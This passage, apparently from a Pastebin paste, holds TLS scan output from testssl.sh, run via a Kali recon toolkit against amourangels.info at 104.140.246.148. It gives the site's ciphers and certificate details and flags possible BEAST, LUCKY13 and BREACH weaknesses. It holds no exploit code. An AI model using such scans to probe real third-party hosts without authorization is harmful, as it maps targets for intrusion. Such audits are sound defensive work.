  664. Preferred TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256  Curve P-256 DHE 256
  665. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384  Curve P-256 DHE 256
  666. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
  667. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
  668. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
  669. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
  670. Accepted TLSv1.2 128 bits AES128-GCM-SHA256
  671. Accepted TLSv1.2 256 bits AES256-GCM-SHA384
  672. Accepted TLSv1.2 128 bits AES128-SHA256
  673. Accepted TLSv1.2 256 bits AES256-SHA256
  674. Accepted TLSv1.2 128 bits AES128-SHA
  675. Accepted TLSv1.2 256 bits AES256-SHA
  676. Preferred TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
  677. Accepted TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
  678. Accepted TLSv1.1 128 bits AES128-SHA
  679. Accepted TLSv1.1 256 bits AES256-SHA
  680. Preferred TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
  681. Accepted TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
  682. Accepted TLSv1.0 128 bits AES128-SHA
  683. Accepted TLSv1.0 256 bits AES256-SHA
  684.  
  685. SSL Certificate:
  686. Signature Algorithm: sha256WithRSAEncryption
  687. RSA Key Strength: 2048
  688.  
  689. Subject: amourangels.info
  690. Altnames: DNS:amourangels.info, DNS:autodiscover.amourangels.info, DNS:cpanel.amourangels.info, DNS:mail.amourangels.info, DNS:webdisk.amourangels.info, DNS:webmail.amourangels.info, DNS:www.amourangels.info
  691. Issuer: cPanel, Inc. Certification Authority
  692.  
  693. Not valid before: Sep 21 00:00:00 2017 GMT
  694. Not valid after: Dec 20 23:59:59 2017 GMT
  695. 
  696. ###########################################################
  697. testssl 2.9dev from https://testssl.sh/dev/
  698. 
  699. This program is free software. Distribution and
  700. modification under GPLv2 permitted.
  701. USAGE w/o ANY WARRANTY. USE IT AT YOUR OWN RISK!
  702.  
  703. Please file bugs @ https://testssl.sh/bugs/
  704. 
  705. ###########################################################
  706.  
  707. Using "OpenSSL 1.0.2-chacha (1.0.2i-dev)" [~183 ciphers]
  708. on Kali:/usr/share/sniper/plugins/testssl.sh/bin/openssl.Linux.x86_64
  709. (built: "Jun 22 19:32:29 2016", platform: "linux-x86_64")
  710.  
  711.  
  712.  Start 2017-09-26 17:40:48 -->> 104.140.246.148:443 (amourangels.info) <<--
  713.  
  714. rDNS (104.140.246.148): server1.dating-club2007.club.
  715. ns1.dating-club2007.club.
  716. Service detected: HTTP
  717.  
  718.  
  719.  Testing protocols via sockets except SPDY+HTTP2 
  720.  
  721.  SSLv2 not offered (OK)
  722.  SSLv3 not offered (OK)
  723.  TLS 1 offered
  724.  TLS 1.1 offered
  725.  TLS 1.2 offered (OK)
  726.  SPDY/NPN h2, spdy/3.1, spdy/3, spdy/2, http/1.1 (advertised)
  727.  HTTP2/ALPN h2, spdy/3.1, http/1.1, spdy/2, spdy/3 (offered)
  728.  
  729.  Testing ~standard cipher categories 
  730.  
  731.  NULL ciphers (no encryption) not offered (OK)
  732.  Anonymous NULL Ciphers (no authentication) not offered (OK)
  733.  Export ciphers (w/o ADH+NULL) not offered (OK)
  734.  LOW: 64 Bit + DES encryption (w/o export) not offered (OK)
  735.  Weak 128 Bit ciphers (SEED, IDEA, RC[2,4]) not offered (OK)
  736.  Triple DES Ciphers (Medium) not offered (OK)
  737.  High encryption (AES+Camellia, no AEAD) offered (OK)
  738.  Strong encryption (AEAD ciphers) offered (OK)
  739.  
  740.  
  741.  Testing robust (perfect) forward secrecy, (P)FS -- omitting Null Authentication/Encryption, 3DES, RC4 
  742.  
  743.  PFS is offered (OK) ECDHE-RSA-AES256-GCM-SHA384
  744. ECDHE-RSA-AES256-SHA384 ECDHE-RSA-AES256-SHA
  745. ECDHE-RSA-CHACHA20-POLY1305
  746. ECDHE-RSA-AES128-GCM-SHA256
  747. ECDHE-RSA-AES128-SHA256 ECDHE-RSA-AES128-SHA
  748.  Elliptic curves offered: prime256v1
  749.  
  750.  
  751.  Testing server preferences 
  752.  
  753.  Has server cipher order? yes (OK)
  754.  Negotiated protocol TLSv1.2
  755.  Negotiated cipher ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  756.  Cipher order
  757. TLSv1: ECDHE-RSA-AES128-SHA ECDHE-RSA-AES256-SHA AES128-SHA AES256-SHA
  758. TLSv1.1: ECDHE-RSA-AES128-SHA ECDHE-RSA-AES256-SHA AES128-SHA AES256-SHA
  759. TLSv1.2: ECDHE-RSA-CHACHA20-POLY1305 ECDHE-RSA-AES128-GCM-SHA256
  760. ECDHE-RSA-AES256-GCM-SHA384 ECDHE-RSA-AES128-SHA256
  761. ECDHE-RSA-AES256-SHA384 ECDHE-RSA-AES128-SHA
  762. ECDHE-RSA-AES256-SHA AES128-GCM-SHA256 AES256-GCM-SHA384
  763. AES128-SHA256 AES256-SHA256 AES128-SHA AES256-SHA
  764.  
  765.  
  766.  Testing server defaults (Server Hello) 
  767.  
  768.  TLS extensions (standard) "renegotiation info/#65281" "server name/#0"
  769. "status request/#5" "next protocol/#13172"
  770. "EC point formats/#11"
  771. "extended master secret/#23"
  772. "application layer protocol negotiation/#16"
  773.  Session Ticket RFC 5077 hint (no lifetime advertised)
  774.  SSL Session ID support yes
  775.  Session Resumption Tickets: yes, ID: yes
  776.  TLS clock skew -1 sec from localtime
  777.  Signature Algorithm SHA256 with RSA
  778.  Server key size RSA 2048 bits
  779.  Fingerprint / Serial SHA1 AEDE924F1243327142E7B33AD2F03010B9390D4C / 488B5892E01C2B2457CD629A118352AD
  780. SHA256 9461C76C28F5DBBEEEC09BD2C4C4CE42964F7CFD53FB3872E938885B7AD0D3AB
  781.  Common Name (CN) amourangels.info (CN in response to request w/o SNI: appreframe.com)
  782.  subjectAltName (SAN) amourangels.info autodiscover.amourangels.info
  783. cpanel.amourangels.info mail.amourangels.info
  784. webdisk.amourangels.info webmail.amourangels.info
  785. www.amourangels.info 
  786.  Issuer cPanel, Inc. Certification Authority (cPanel, Inc. from US)
  787.  Trust (hostname) Ok via SAN and CN (same w/o SNI)
  788.  Chain of trust Ok 
  789.  EV cert (experimental) no
  790.  Certificate Expiration 85 >= 60 days (2017-09-20 20:00 --> 2017-12-20 18:59 -0500)
  791.  # of certificates provided 3
  792.  Certificate Revocation List http://crl.comodoca.com/cPanelIncCertificationAuthority.crl
  793.  OCSP URI http://ocsp.comodoca.com
  794.  OCSP stapling offered
  795.  OCSP must staple no
  796.  DNS CAA RR (experimental) --
  797.  Certificate Transparency no
  798.  
  799.  
  800.  Testing HTTP header response @ "/" 
  801.  
  802.  HTTP Status Code  200 OK
  803.  HTTP clock skew -1 sec from localtime
  804.  Strict Transport Security --
  805.  Public Key Pinning --
  806.  Server banner LiteSpeed
  807.  Application banner --
  808.  Cookie(s) (none issued at "/")
  809.  Security headers --
  810.  Reverse Proxy banner --
  811.  
  812.  
  813.  Testing vulnerabilities 
  814.  
  815.  Heartbleed (CVE-2014-0160) not vulnerable (OK), no heartbeat extension
  816.  CCS (CVE-2014-0224) not vulnerable (OK)
  817.  Ticketbleed (CVE-2016-9244), experiment. not vulnerable (OK), no session ticket extension
  818.  Secure Renegotiation (CVE-2009-3555) not vulnerable (OK)
  819.  Secure Client-Initiated Renegotiation not vulnerable (OK)
  820.  CRIME, TLS (CVE-2012-4929) not vulnerable (OK)
  821.  BREACH (CVE-2013-3587) potentially NOT ok, uses gzip HTTP compression. - only supplied "/" tested
  822. Can be ignored for static pages or if no secrets in the page
  823.  POODLE, SSL (CVE-2014-3566) not vulnerable (OK)
  824.  TLS_FALLBACK_SCSV (RFC 7507) Downgrade attack prevention supported (OK)
  825.  SWEET32 (CVE-2016-2183, CVE-2016-6329) not vulnerable (OK)
  826.  FREAK (CVE-2015-0204) not vulnerable (OK)
  827.  DROWN (CVE-2016-0800, CVE-2016-0703) not vulnerable on this host and port (OK)
  828. make sure you don't use this certificate elsewhere with SSLv2 enabled services
  829. https://censys.io/ipv4?q=9461C76C28F5DBBEEEC09BD2C4C4CE42964F7CFD53FB3872E938885B7AD0D3AB could help you to find out
  830.  LOGJAM (CVE-2015-4000), experimental not vulnerable (OK): no DH EXPORT ciphers, no DH key detected
  831.  BEAST (CVE-2011-3389) TLS1: ECDHE-RSA-AES128-SHA
  832. ECDHE-RSA-AES256-SHA
  833. AES128-SHA AES256-SHA 
  834. VULNERABLE -- but also supports higher protocols (possible mitigation): TLSv1.1 TLSv1.2
  835.  LUCKY13 (CVE-2013-0169), experimental potentially VULNERABLE, uses cipher block chaining (CBC) ciphers with TLS
  836.  RC4 (CVE-2013-2566, CVE-2015-2808) no RC4 ciphers detected (OK)
  837.  
  838.  
  839.  Testing 359 ciphers via OpenSSL plus sockets against the server, ordered by encryption strength 
  840.  
  841. Hexcode Cipher Suite Name (OpenSSL) KeyExch. Encryption Bits Cipher Suite Name (RFC)
  842. -----------------------------------------------------------------------------------------------------------------------------
  843. xc030 ECDHE-RSA-AES256-GCM-SHA384 ECDH 256 AESGCM 256 TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384
  844. xc028 ECDHE-RSA-AES256-SHA384 ECDH 256 AES 256 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384
  845. xc014 ECDHE-RSA-AES256-SHA ECDH 256 AES 256 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
  846. xcca8 ECDHE-RSA-CHACHA20-POLY1305 ECDH 256 ChaCha20 256 TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256
  847. x9d AES256-GCM-SHA384 RSA AESGCM 256 TLS_RSA_WITH_AES_256_GCM_SHA384
  848. x3d AES256-SHA256 RSA AES 256 TLS_RSA_WITH_AES_256_CBC_SHA256
  849. x35 AES256-SHA RSA AES 256 TLS_RSA_WITH_AES_256_CBC_SHA
  850. xc02f ECDHE-RSA-AES128-GCM-SHA256 ECDH 256 AESGCM 128 TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256
  851. xc027 ECDHE-RSA-AES128-SHA256 ECDH 256 AES 128 TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256
  852. xc013 ECDHE-RSA-AES128-SHA ECDH 256 AES 128 TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA
  853. x9c AES128-GCM-SHA256 RSA AESGCM 128 TLS_RSA_WITH_AES_128_GCM_SHA256
  854. x3c AES128-SHA256 RSA AES 128 TLS_RSA_WITH_AES_128_CBC_SHA256
  855. x2f AES128-SHA RSA AES 128 TLS_RSA_WITH_AES_128_CBC_SHA
  856.  
  857.  
  858.  Running client simulations via sockets 
  859.  
  860. Android 2.3.7
  861. Unable to open a socket to 104.140.246.148:443. No connection
  862. Android 4.1.1 TLSv1.0 ECDHE-RSA-AES128-SHA, 256 bit ECDH (P-256)
  863. Android 4.3 TLSv1.0 ECDHE-RSA-AES128-SHA, 256 bit ECDH (P-256)
  864. Android 4.4.2 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  865. Android 5.0.0 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  866. Android 6.0 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  867. Android 7.0 TLSv1.2 ECDHE-RSA-CHACHA20-POLY1305, 256 bit ECDH (P-256)
  868. Chrome 51 Win 7 TLSv1.2 ECDHE-RSA-CHACHA20-POLY1305, 256 bit ECDH (P-256)
  869. Chrome 57 Win 7 No connection
  870. Firefox 49 Win 7 TLSv1.2 ECDHE-RSA-CHACHA20-POLY1305, 256 bit ECDH (P-256)
  871. Firefox 53 Win 7 No connection
  872. IE 6 XP
  873. Unable to open a socket to 104.140.246.148:443. No connection
  874. IE 7 Vista TLSv1.0 ECDHE-RSA-AES128-SHA, 256 bit ECDH (P-256)
  875. IE 8 XP No connection
  876. IE 8 Win 7 TLSv1.0 ECDHE-RSA-AES128-SHA, 256 bit ECDH (P-256)
  877. IE 11 Win 7 TLSv1.2 ECDHE-RSA-AES128-SHA256, 256 bit ECDH (P-256)
  878. IE 11 Win 8.1 TLSv1.2 ECDHE-RSA-AES128-SHA256, 256 bit ECDH (P-256)
  879. IE 11 Win Phone 8.1 Update TLSv1.2 ECDHE-RSA-AES128-SHA256, 256 bit ECDH (P-256)
  880. IE 11 Win 10 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  881. Edge 13 Win 10 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  882. Edge 13 Win Phone 10 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  883. Opera 17 Win 7 TLSv1.2 ECDHE-RSA-AES128-SHA256, 256 bit ECDH (P-256)
  884. Safari 5.1.9 OS X 10.6.8 TLSv1.0 ECDHE-RSA-AES128-SHA, 256 bit ECDH (P-256)
  885. Safari 7 iOS 7.1 TLSv1.2 ECDHE-RSA-AES128-SHA256, 256 bit ECDH (P-256)
  886. Safari 9 OS X 10.11
  887. Unable to open a socket to 104.140.246.148:443. No connection
  888. Safari 10 OS X 10.12 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  889. Apple ATS 9 iOS 9 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  890. Tor 17.0.9 Win 7
  891. Unable to open a socket to 104.140.246.148:443. No connection
  892. Java 6u45 TLSv1.0 AES128-SHA
  893. Java 7u25 TLSv1.0 ECDHE-RSA-AES128-SHA, 256 bit ECDH (P-256)
  894. Java 8u31
  895. Unable to open a socket to 104.140.246.148:443. No connection
  896. OpenSSL 1.0.1l
  897. Unable to open a socket to 104.140.246.148:443. No connection
  898. OpenSSL 1.0.2e TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  899.  
  900.  Done 2017-09-26 17:59:11 [1105s] -->> 104.140.246.148:443 (amourangels.info) <<--
Advertisement
Add Comment
Please, Sign In to add comment